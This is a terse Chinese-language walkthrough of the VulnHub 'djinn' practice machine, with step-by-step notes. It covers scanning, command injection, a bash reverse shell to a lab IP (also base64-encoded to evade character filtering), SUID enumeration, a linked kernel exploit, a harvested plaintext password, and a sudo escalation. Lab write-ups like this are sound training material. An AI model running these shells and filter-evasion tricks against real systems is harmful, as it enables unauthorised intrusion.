靶機下載連接:shell
https://download.vulnhub.com/djinn/djinn.ovabash
主機端口掃描:tcp
FTP發現一些文件提示編碼
1337端口是一個遊戲,去看下server
哈哈有點難,暫時放棄,看看7331HTTP server 這邊有麼有發現blog
使用dirb dirsearch 自帶字典沒有發現,加大字段枚舉下目錄遊戲
命令執行ip
反彈shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直彈不出來,猜想特殊字符作了過濾terminal
base64 編碼執行cmd
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash
接下來進行提權操做
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
內核:Linux djinn 4.15.0-66-generic
exp提權失敗:https://www.exploit-db.com/download/47163
路徑/home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9 密碼
切換用戶可能會提示:su: must be run from a terminal
執行此命令:/usr/bin/script -qc /bin/bash /dev/null
sudo - u sam genie -cmd new
OVER!!